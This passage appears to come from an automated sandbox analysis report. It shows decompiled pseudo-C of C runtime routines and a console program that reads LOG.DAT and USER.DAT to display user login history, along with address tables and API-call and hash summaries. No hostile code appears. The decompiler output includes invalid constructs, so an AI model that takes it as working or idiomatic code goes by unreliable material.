					__eflags = _t74 & 0x00000082;
					if(__eflags != 0) {
						__eflags = _t74 & 0x00000040;
						if(__eflags == 0) {
							_t70 = 0;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								L10:
								_t48 = _t92[3] & 0xffffffef | 0x00000002;
								_t92[3] = _t48;
								_t92[1] = _t70;
								__eflags = _t48 & 0x0000010c;
								if((_t48 & 0x0000010c) == 0) {
									_t60 = E00D88C10();
									__eflags = _t92 - _t60 + 0x20;
									if(_t92 == _t60 + 0x20) {
										L13:
										_t62 = E00D91187(_t89);
										__eflags = _t62;
										if(_t62 == 0) {
											goto L14;
										}
									} else {
										_t64 = E00D88C10();
										__eflags = _t92 - _t64 + 0x40;
										if(_t92 != _t64 + 0x40) {
											L14:
											E00D918CE(_t92);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t92[3] & 0x00000108;
								if((_t92[3] & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_v8 = 1;
									_push( &_a4);
									_push(_t89);
									_t45 = E00D902E3(_t70, _t86, _t89, _t92, 1);
									_t70 = _t45;
									goto L27;
								} else {
									_t87 = _t92[2];
									_t25 = _t87 + 1; // 0x1a06
									 *_t92 = _t25;
									_t76 =  *_t92 - _t87;
									_v8 = _t76;
									_t92[1] = _t92[6] - 1;
									__eflags = _t76;
									if(__eflags <= 0) {
										__eflags = _t89 - 0xffffffff;
										if(_t89 == 0xffffffff) {
											L22:
											_t77 = 0xda1390;
										} else {
											__eflags = _t89 - 0xfffffffe;
											if(_t89 == 0xfffffffe) {
												goto L22;
											} else {
												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0xda2f60 + (_t89 >> 5) * 4));
											}
										}
										__eflags =  *(_t77 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t70);
											_push(_t70);
											_push(_t89);
											_t45 = E00D91754(_t70, _t89, _t92, __eflags) & _t87;
											__eflags = _t45 - 0xffffffff;
											if(_t45 == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t76);
										_push(_t87);
										_push(_t89);
										_t70 = E00D902E3(_t70, _t87, _t89, _t92, __eflags);
										L25:
										_t45 = _a4;
										 *(_t92[2]) = _t45;
										L27:
										__eflags = _t70 - _v8;
										if(_t70 == _v8) {
											_t52 = _a4 & 0x000000ff;
										} else {
											L28:
											_t40 =  &(_t92[3]);
											 *_t40 = _t92[3] | 0x00000020;
											__eflags =  *_t40;
											goto L29;
										}
									}
								}
							} else {
								_t92[1] = 0;
								__eflags = _t74 & 0x00000010;
								if((_t74 & 0x00000010) == 0) {
									_t92[3] = _t74 | 0x00000020;
									L29:
									_t52 = _t45 | 0xffffffff;
								} else {
									_t85 = _t74 & 0xfffffffe;
									__eflags = _t85;
									 *_t92 = _t92[2];
									_t92[3] = _t85;
									goto L10;
								}
							}
						} else {
							_t67 = E00D88E9F(__eflags);
							 *_t67 = 0x22;
							goto L6;
						}
					} else {
						_t67 = E00D88E9F(__eflags);
						 *_t67 = 9;
						L6:
						_t92[3] = _t92[3] | 0x00000020;
						_t52 = _t67 | 0xffffffff;
					}
					return _t52;
				} else {
					return _t44 | 0xffffffff;
				}
			}


























                                              0x00d8bb10
                                              0x00d8bb17
                                              0x00d8bb1f
                                              0x00d8bb24
                                              0x00d8bb2a
                                              0x00d8bb2d
                                              0x00d8bb2f
                                              0x00d8bb32
                                              0x00d8bb41
                                              0x00d8bb44
                                              0x00d8bb5e
                                              0x00d8bb60
                                              0x00d8bb63
                                              0x00d8bb78
                                              0x00d8bb7e
                                              0x00d8bb81
                                              0x00d8bb84
                                              0x00d8bb87
                                              0x00d8bb8c
                                              0x00d8bb8e
                                              0x00d8bb96
                                              0x00d8bb98
                                              0x00d8bba6
                                              0x00d8bba7
                                              0x00d8bbad
                                              0x00d8bbaf
                                              0x00000000
                                              0x00000000
                                              0x00d8bb9a
                                              0x00d8bb9a
                                              0x00d8bba2
                                              0x00d8bba4
                                              0x00d8bbb1
                                              0x00d8bbb2
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d8bba4
                                              0x00d8bb98
                                              0x00d8bbb8
                                              0x00d8bbbf
                                              0x00d8bc3d
                                              0x00d8bc3e
                                              0x00d8bc3f
                                              0x00d8bc45
                                              0x00d8bc46
                                              0x00d8bc47
                                              0x00d8bc4f
                                              0x00000000
                                              0x00d8bbc1
                                              0x00d8bbc1
                                              0x00d8bbc6
                                              0x00d8bbc9
                                              0x00d8bbce
                                              0x00d8bbd1
                                              0x00d8bbd4
                                              0x00d8bbd7
                                              0x00d8bbd9
                                              0x00d8bbf2
                                              0x00d8bbf5
                                              0x00d8bc12
                                              0x00d8bc12
                                              0x00d8bbf7
                                              0x00d8bbf7
                                              0x00d8bbfa
                                              0x00000000
                                              0x00d8bbfc
                                              0x00d8bc09
                                              0x00d8bc09
                                              0x00d8bbfa
                                              0x00d8bc17
                                              0x00d8bc1b
                                              0x00000000
                                              0x00d8bc1d
                                              0x00d8bc1d
                                              0x00d8bc1f
                                              0x00d8bc20
                                              0x00d8bc21
                                              0x00d8bc27
                                              0x00d8bc2c
                                              0x00d8bc2f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d8bc2f
                                              0x00d8bbdb
                                              0x00d8bbdb
                                              0x00d8bbdc
                                              0x00d8bbdd
                                              0x00d8bbe6
                                              0x00d8bc31
                                              0x00d8bc34
                                              0x00d8bc37
                                              0x00d8bc51
                                              0x00d8bc51
                                              0x00d8bc54
                                              0x00d8bc5f
                                              0x00d8bc56
                                              0x00d8bc56
                                              0x00d8bc56
                                              0x00d8bc56
                                              0x00d8bc56
                                              0x00000000
                                              0x00d8bc56
                                              0x00d8bc54
                                              0x00d8bbd9
                                              0x00d8bb65
                                              0x00d8bb65
                                              0x00d8bb68
                                              0x00d8bb6b
                                              0x00d8bbed
                                              0x00d8bc5a
                                              0x00d8bc5a
                                              0x00d8bb6d
                                              0x00d8bb70
                                              0x00d8bb70
                                              0x00d8bb73
                                              0x00d8bb75
                                              0x00000000
                                              0x00d8bb75
                                              0x00d8bb6b
                                              0x00d8bb46
                                              0x00d8bb46
                                              0x00d8bb4b
                                              0x00000000
                                              0x00d8bb4b
                                              0x00d8bb34
                                              0x00d8bb34
                                              0x00d8bb39
                                              0x00d8bb51
                                              0x00d8bb51
                                              0x00d8bb55
                                              0x00d8bb55
                                              0x00d8bc67
                                              0x00d8bb19
                                              0x00d8bb1d
                                              0x00d8bb1d

                                              APIs
                                              • __ioinit.LIBCMT ref: 00D8BB10
                                                • Part of subcall function 00D8A547: InitOnceExecuteOnce.KERNEL32(00DA229C,00D8A582,00000000,00000000,00D911A5,?,?,00D89826,00000000,?,?,?,00D8714D,-00000020,00D9D7B8,0000000C), ref: 00D8A555
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Once$ExecuteInit__ioinit
                                              • String ID:
                                              • API String ID: 129814473-0
                                              • Opcode ID: 7ba4d56fffb3502403aaf761c1d2a598d472e4eb1a789f79f3898d195fd18ee7
                                              • Instruction ID: 3dbc1e2488b415a55d8f164de93a3f1a2d79624effbe148f7764e7ae1ae8c599
                                              • Opcode Fuzzy Hash: 7ba4d56fffb3502403aaf761c1d2a598d472e4eb1a789f79f3898d195fd18ee7
                                              • Instruction Fuzzy Hash: F241D371500B059FD724AB79C892A7A7BA4EF45370F18861EE4A6C72D1EB74E8409B30
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D91CC6, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E00D91CC6(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0xda2a68, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0xda2a64 - _t7;
								if(__eflags == 0) {
									_t9 = E00D88E9F(__eflags);
									 *_t9 = E00D88EB2(GetLastError());
									goto L17;
								} else {
									__eflags = E00D8C68E(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E00D88E9F(__eflags);
										 *_t12 = E00D88EB2(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00D8C68E(_t6, _t31);
						 *((intOrPtr*)(E00D88E9F(__eflags))) = 0xc;
						goto L12;
					} else {
						E00D88EF3(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00D87765(__ebx, __edx, __edi, _a8);
				}
			}









                                              0x00d91ccd
                                              0x00d91cdb
                                              0x00d91cde
                                              0x00d91ce0
                                              0x00d91cef
                                              0x00d91d22
                                              0x00d91d22
                                              0x00d91d25
                                              0x00000000
                                              0x00000000
                                              0x00d91cf2
                                              0x00d91cf4
                                              0x00d91cf6
                                              0x00d91cf6
                                              0x00d91cf6
                                              0x00d91d03
                                              0x00d91d09
                                              0x00d91d0b
                                              0x00d91d0d
                                              0x00d91d6d
                                              0x00d91d6d
                                              0x00d91d0f
                                              0x00d91d0f
                                              0x00d91d15
                                              0x00d91d57
                                              0x00d91d6b
                                              0x00000000
                                              0x00d91d17
                                              0x00d91d1e
                                              0x00d91d20
                                              0x00d91d3f
                                              0x00d91d53
                                              0x00d91d39
                                              0x00d91d39
                                              0x00d91d39
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d91d20
                                              0x00d91d15
                                              0x00000000
                                              0x00d91d3b
                                              0x00d91d28
                                              0x00d91d33
                                              0x00000000
                                              0x00d91ce2
                                              0x00d91ce5
                                              0x00d91ceb
                                              0x00d91ceb
                                              0x00d91d3c
                                              0x00d91d3e
                                              0x00d91ccf
                                              0x00d91cd9
                                              0x00d91cd9

                                              APIs
                                              • _malloc.LIBCMT ref: 00D91CD2
                                                • Part of subcall function 00D87765: __FF_MSGBANNER.LIBCMT ref: 00D8777C
                                                • Part of subcall function 00D87765: __NMSG_WRITE.LIBCMT ref: 00D87783
                                                • Part of subcall function 00D87765: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00D8C55B,00000000,00000000,00000000,00000000,?,00D8BEC8,00000018,00D9D900), ref: 00D877A8
                                              • _free.LIBCMT ref: 00D91CE5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: AllocHeap_free_malloc
                                              • String ID:
                                              • API String ID: 2734353464-0
                                              • Opcode ID: 7e8d11a3804946a9dbc8a7c652bb28a547d2978d11c1ba726d7aa9f26f235918
                                              • Instruction ID: cdce7c3ece98b575e0d9b4dafc53735cb4f4ca3e90ffcc8558ff55c6eba36e45
                                              • Opcode Fuzzy Hash: 7e8d11a3804946a9dbc8a7c652bb28a547d2978d11c1ba726d7aa9f26f235918
                                              • Instruction Fuzzy Hash: 28117336905317ABCF313B75AC056AA3798EF01360F544925F9899A291EF75C880A7B0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D8851D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON
                                              Download Yara Rule
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 00D885AD
                                                • Part of subcall function 00D8E7E0: __87except.LIBCMT ref: 00D8E81B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ErrorHandling__87except__start
                                              • String ID: pow
                                              • API String ID: 2905807303-2276729525
                                              • Opcode ID: 26ac1552964ab015491f5dddb2d1f08138c357a33b38d8bd88e77ae8eb81b4ca
                                              • Instruction ID: b72e9c704fc3e10d6bed10843bd7cd7a500e25c12ee37dfb4e96d1f2154d6a4c
                                              • Opcode Fuzzy Hash: 26ac1552964ab015491f5dddb2d1f08138c357a33b38d8bd88e77ae8eb81b4ca
                                              • Instruction Fuzzy Hash: B7514C61E0820296DB11B718CD4237E3BA4EB41750F688DA9F4D5822E5EF74CC94AF76
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D8341B, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 83%
                                              			E00D8341B(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _t218;
				void* _t228;
				void* _t249;
				void* _t270;
				void* _t283;
				void* _t287;
				void* _t306;
				intOrPtr _t307;
				void* _t309;
				intOrPtr _t310;
				void* _t313;
				void* _t314;
				intOrPtr _t320;
				void* _t336;
				intOrPtr _t364;
				void* _t371;
				intOrPtr _t394;
				void* _t397;
				void* _t421;
				void* _t433;
				void* _t435;
				void* _t436;
				void* _t437;
				void* _t442;
				void* _t443;
				void* _t446;
				void* _t448;
				void* _t450;
				void* _t451;
				void* _t457;

				L0:
				while(1) {
					L0:
					_t457 = __fp0;
					_t421 = __esi;
					_t397 = __edi;
					_t314 = __ebx;
					 *(_t433 - 8) = 1 +  *(_t433 - 8);
					 *(_t433 - 0xc) = 1 +  *(_t433 - 0xc);
					while(1) {
						L69:
						__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
						if(__eflags < 0) {
						}
						L70:
						E00D81250(5,  *(_t433 - 0xc) + 0xa);
						_push(1 +  *(_t433 - 8));
						_push("%d.");
						E00D870FC(_t314, _t397, _t421, __eflags);
						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x36)) = 0;
						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x40)) = 0;
						_t181 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
						_t270 = E00D88260( *((intOrPtr*)(_t433 - 0x10)) + _t181);
						_t448 = _t435 + 0xc;
						__eflags = _t270 - 0xa;
						if(__eflags < 0) {
							_t336 =  *(_t433 - 8) * 0x45;
							__eflags = _t336;
							_t185 = _t336 + 0x22; // 0x23
							_push( *((intOrPtr*)(_t433 - 0x10)) + _t185);
							E00D81640(_t397, _t421, _t457);
						}
						L72:
						E00D81250(9,  *(_t433 - 0xc) + 0xa);
						_t190 = 0x3b +  *(_t433 - 8) * 0x45; // 0x3c
						_push( *((intOrPtr*)(_t433 - 0x10)) + _t190);
						_t194 = 0x31 +  *(_t433 - 8) * 0x45; // 0x32
						_push( *((intOrPtr*)(_t433 - 0x10)) + _t194);
						_t198 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
						_push( *((intOrPtr*)(_t433 - 0x10)) + _t198);
						_t202 = 4 +  *(_t433 - 8) * 0x45; // 0x5
						_push( *((intOrPtr*)(_t433 - 0x10)) + _t202);
						_push("%s\t\t%s\t%s\t\t%s");
						E00D870FC(_t314, _t397, _t421, __eflags);
						_t435 = _t448 + 0x14;
						__eflags =  *(_t433 - 8) -  *(_t433 - 0x1c) + 9;
						if( *(_t433 - 8) <  *(_t433 - 0x1c) + 9) {
							L74:
							goto L0;
						} else {
							L73:
							 *(_t433 - 0x1c) =  *(_t433 - 0x1c) + 0xa;
						}
						L75:
						_t322 =  *((char*)(_t433 - 1));
						__eflags =  *((char*)(_t433 - 1)) - 0x53;
						if( *((char*)(_t433 - 1)) == 0x53) {
							L77:
							 *(_t433 - 0x34) = 1;
						} else {
							L76:
							__eflags =  *((char*)(_t433 - 1)) - 0x73;
							if( *((char*)(_t433 - 1)) == 0x73) {
								goto L77;
							}
						}
						L78:
						__eflags =  *((char*)(_t433 - 1)) - 0x20;
						if( *((char*)(_t433 - 1)) == 0x20) {
							_t322 =  *(_t433 - 8);
							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
							if( *(_t433 - 8) ==  *(_t433 - 0x14)) {
								 *(_t433 - 0x1c) = 0;
							}
						}
						L81:
						__eflags =  *((char*)(_t433 - 1)) - 0x53;
						if(__eflags == 0) {
							L50:
							E00D82080(_t322, _t397, _t421, __eflags, _t457);
							__eflags =  *(_t433 - 0x14) - 0xc;
							if(__eflags >= 0) {
								E00D81250(0xf, 0x15);
								_push("Press SPACE BAR to view more data");
								E00D870FC(_t314, _t397, _t421, __eflags);
								_t446 = _t435 + 4;
							} else {
								E00D81250(8, 0x15);
								_push("Press S to toggle Sorting between ascending or descending order.");
								E00D870FC(_t314, _t397, _t421, __eflags);
								_t446 = _t435 + 4;
							}
							L53:
							E00D81250(5, 8);
							_push("SN\t User Name\tDate\t\tStart time\tEnd Time");
							E00D870FC(_t314, _t397, _t421, __eflags);
							_t435 = _t446 + 4;
							E00D81250(4, 9);
							 *(_t433 - 8) = 0;
							while(1) {
								L55:
								__eflags =  *(_t433 - 8) - 0x46;
								if(__eflags >= 0) {
									break;
								}
								L56:
								_push(0xc4);
								_push("%c");
								E00D870FC(_t314, _t397, _t421, __eflags);
								_t435 = _t435 + 8;
								L54:
								_t287 = 1 +  *(_t433 - 8);
								__eflags = _t287;
								 *(_t433 - 8) = _t287;
							}
							L57:
							__eflags =  *(_t433 - 0x34);
							if( *(_t433 - 0x34) != 0) {
								L58:
								 *(_t433 - 8) =  *(_t433 - 0x14) - 1;
								while(1) {
									L60:
									__eflags =  *(_t433 - 8);
									if( *(_t433 - 8) < 0) {
										break;
									}
									L61:
									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
									memcpy(( *(_t433 - 0x14) -  *(_t433 - 8) - 1) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
									_t435 = _t435 + 0xc;
									_t397 = _t421 + 0x22;
									asm("movsb");
									L59:
									_t371 =  *(_t433 - 8) - 1;
									__eflags = _t371;
									 *(_t433 - 8) = _t371;
								}
								L62:
								 *(_t433 - 8) = 0;
								while(1) {
									L64:
									__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
									if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
										goto L66;
									}
									L65:
									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
									memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
									_t435 = _t435 + 0xc;
									_t397 = _t421 + 0x22;
									asm("movsb");
									L63:
									_t283 = 1 +  *(_t433 - 8);
									__eflags = _t283;
									 *(_t433 - 8) = _t283;
								}
							}
							L66:
							__eflags =  *(_t433 - 0x1c) -  *(_t433 - 0x14);
							if( *(_t433 - 0x1c) >  *(_t433 - 0x14)) {
								 *(_t433 - 0x1c) = 0;
							}
							L68:
							 *(_t433 - 8) =  *(_t433 - 0x1c);
							 *(_t433 - 0xc) = 0;
							L69:
							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
							if(__eflags < 0) {
							}
							goto L75;
						}
						L82:
						_t249 =  *((char*)(_t433 - 1));
						__eflags = _t249 - 0x73;
						if(__eflags == 0) {
							goto L50;
						}
						L83:
						_t322 =  *((char*)(_t433 - 1));
						__eflags =  *((char*)(_t433 - 1)) - 0x20;
						if(__eflags == 0) {
							goto L50;
						}
						L84:
						while(1) {
							L86:
							__eflags = 1;
							if(1 == 0) {
								break;
							}
							L1:
							 *(_t433 - 8) = 0;
							 *(_t433 - 0x28) = 0;
							 *(_t433 - 0x1c) = 0;
							 *(_t433 - 0x34) = 0;
							_t218 = E00D86E91("LOG.DAT", "r");
							_t436 = _t435 + 8;
							 *0xda2f20 = _t218;
							while(1) {
								L2:
								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x3b +  *(_t433 - 8) * 0x45);
								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x31 +  *(_t433 - 8) * 0x45);
								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x22 +  *(_t433 - 8) * 0x45);
								_t320 =  *0xda2f20; // 0x0
								_t228 = E00D86FC1(_t320, "%s %s %s %s\n",  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)));
								_t437 = _t436 + 0x18;
								if(_t228 == 0xffffffff) {
									break;
								}
								L3:
								_t307 = E00D86E91("USER.DAT", "r");
								_t450 = _t437 + 8;
								 *0xda2f28 = _t307;
								while(1) {
									L4:
									_push(_t433 - 0x78);
									_push(_t433 - 0x58);
									_t394 =  *0xda2f28; // 0x0
									_t309 = E00D86FC1(_t394, "%s %s %s\n", _t433 - 0x38);
									_t451 = _t450 + 0x14;
									if(_t309 == 0xffffffff) {
										break;
									}
									L5:
									_t313 = E00D881D0( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)), _t433 - 0x38);
									_t450 = _t451 + 8;
									if(_t313 == 0) {
										 *(_t433 - 8) = 1 +  *(_t433 - 8);
									}
								}
								L8:
								_t310 =  *0xda2f28; // 0x0
								_push(_t310);
								E00D86D56(_t314, _t397, _t421, __eflags);
								_t436 = _t451 + 4;
							}
							L9:
							 *(_t433 - 0x30) =  *(_t433 - 8);
							_t364 =  *0xda2f20; // 0x0
							_push(_t364);
							E00D86D56(_t314, _t397, _t421, __eflags);
							E00D82080( *(_t433 - 8), _t397, _t421, __eflags, _t457);
							E00D81250(0x1e, 8);
							_push("1. View by USER NAME");
							E00D870FC(_t314, _t397, _t421, __eflags);
							E00D81250(0x1e, 0xa);
							_push("2. View by DATE");
							E00D870FC(_t314, _t397, _t421, __eflags);
							E00D81250(0x1e, 0xc);
							_push("3. View ALL User history");
							E00D870FC(_t314, _t397, _t421, __eflags);
							E00D81250(0x1e, 0xe);
							_push("4. Return to main menu");
							E00D870FC(_t314, _t397, _t421, __eflags);
							_t442 = _t437 + 0x14;
							E00D81250(1, 0xf);
							 *(_t433 - 8) = 0;
							while(1) {
								L11:
								__eflags =  *(_t433 - 8) - 0x4e;
								if(__eflags >= 0) {
									break;
								}
								L12:
								_push("_");
								E00D870FC(_t314, _t397, _t421, __eflags);
								_t442 = _t442 + 4;
								_t306 = 1 +  *(_t433 - 8);
								__eflags = _t306;
								 *(_t433 - 8) = _t306;
							}
							L13:
							E00D81250(0x17, 0x11);
							_push(" Press a number between the range [1 -4]  ");
							E00D870FC(_t314, _t397, _t421, __eflags);
							_t443 = _t442 + 4;
							 *(_t433 - 0xc) = 0;
							_t322 =  *(_t433 - 0xc);
							 *((char*)(_t433 - 2)) =  *(_t433 - 0xc);
							E00D82080( *(_t433 - 0xc), _t397, _t421, __eflags, _t457);
							 *(_t433 - 0x20) =  *((char*)(_t433 - 2));
							 *(_t433 - 0x20) =  *(_t433 - 0x20) - 1;
							__eflags =  *(_t433 - 0x20) - 3;
							if(__eflags > 0) {
								L38:
								E00D82080(_t322, _t397, _t421, __eflags, _t457);
								E00D81250(0xa, 0xa);
								_push("Your input is out of range! Enter a choice between 1 to 4!");
								E00D870FC(_t314, _t397, _t421, __eflags);
								E00D81250(0xf, 0xc);
								_push("Press ENTER to return to main menu...");
								_t249 = E00D870FC(_t314, _t397, _t421, __eflags);
								_t435 = _t443 + 8;
								 *(_t433 - 0x28) = 1;
								goto L39;
							} else {
								L14:
								switch( *((intOrPtr*)( *(_t433 - 0x20) * 4 +  &M00D83598))) {
									case 0:
										L15:
										E00D81250(0x1e, 0xa);
										_push("Enter user name : ");
										E00D870FC(_t314, _t397, _t421, __eflags);
										_t365 = _t433 - 0x58;
										_t249 = E00D8732B(" %s", _t433 - 0x58);
										_t435 = _t443 + 0xc;
										 *(_t433 - 8) = 0;
										while(1) {
											L17:
											__eflags =  *(_t433 - 8) -  *(_t433 - 0x30);
											if( *(_t433 - 8) >=  *(_t433 - 0x30)) {
												break;
											}
											L18:
											_t365 =  *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45;
											_t299 = E00D881D0( *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45, _t433 - 0x58);
											_t435 = _t435 + 8;
											__eflags = _t299;
											if(_t299 == 0) {
												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18));
												memcpy( *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
												_t435 = _t435 + 0xc;
												_t397 = _t421 + 0x22;
												asm("movsb");
												_t303 = 1 +  *(_t433 - 0xc);
												__eflags = _t303;
												 *(_t433 - 0xc) = _t303;
											}
											_t249 = 1 +  *(_t433 - 8);
											__eflags = _t249;
											 *(_t433 - 8) = _t249;
										}
										L21:
										_t322 =  *(_t433 - 0xc);
										 *(_t433 - 0x14) =  *(_t433 - 0xc);
										goto L39;
									case 1:
										do {
											L22:
											__eax = E00D81250(0x1e, 0xa);
											_push("Enter Date (dd/mm/yyyy) : ");
											__eax = E00D870FC(__ebx, __edi, __esi, __eflags);
											__esp = __esp + 4;
											__edx = __ebp - 0x58;
											E00D8732B(" %s", __ebp - 0x58) = __ebp - 0x58;
											__eflags = E00D81E00(__eflags, __ebp - 0x58);
											if(__eflags == 0) {
												__eax = E00D814A0(__edi, __esi, 0x1e, 0xa, 0x46, 0xa);
												_push(0xd9f8b0);
												__eax = E00D870FC(__ebx, __edi, __esi, __eflags);
												__esp = __esp + 4;
											}
											__ecx = __ebp - 0x58;
											__eflags = E00D81E00(__eflags, __ebp - 0x58);
										} while (__eflags == 0);
										__edx = __ebp - 0x58;
										_push(__ebp - 0x58);
										__eax = E00D81570();
										 *(__ebp - 8) = 0;
										 *(__ebp - 0xc) = 0;
										while(1) {
											L27:
											__ecx =  *(__ebp - 8);
											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
												break;
											}
											L28:
											__edx = __ebp - 0x58;
											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
											__ecx =  *(__ebp - 0x18);
											__edx =  *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45;
											__eax = E00D881D0( *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45, __ebp - 0x58);
											__eflags = __eax;
											if(__eax == 0) {
												 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
												__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
												 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
												__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
												__ecx = 0x11;
												__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
												__edi = __esi + __ecx;
												__edi = __esi + __ecx + __ecx;
												__ecx = 0;
												asm("movsb");
												__eax =  *(__ebp - 0xc);
												__eax = 1 +  *(__ebp - 0xc);
												__eflags = __eax;
												 *(__ebp - 0xc) = __eax;
											}
											__eax =  *(__ebp - 8);
											__eax = 1 +  *(__ebp - 8);
											__eflags = __eax;
											 *(__ebp - 8) = __eax;
										}
										L31:
										__ecx =  *(__ebp - 0xc);
										 *(__ebp - 0x14) = __ecx;
										goto L39;
									case 2:
										L32:
										 *(__ebp - 8) = 0;
										while(1) {
											L34:
											__eax =  *(__ebp - 8);
											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
												break;
											}
											L35:
											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
											__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
											 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
											__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
											__ecx = 0x11;
											__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
											__edi = __esi + __ecx;
											__edi = __esi + __ecx + __ecx;
											__ecx = 0;
											asm("movsb");
											__ecx =  *(__ebp - 0xc);
											__ecx = 1 +  *(__ebp - 0xc);
											 *(__ebp - 0xc) = __ecx;
											__edx =  *(__ebp - 8);
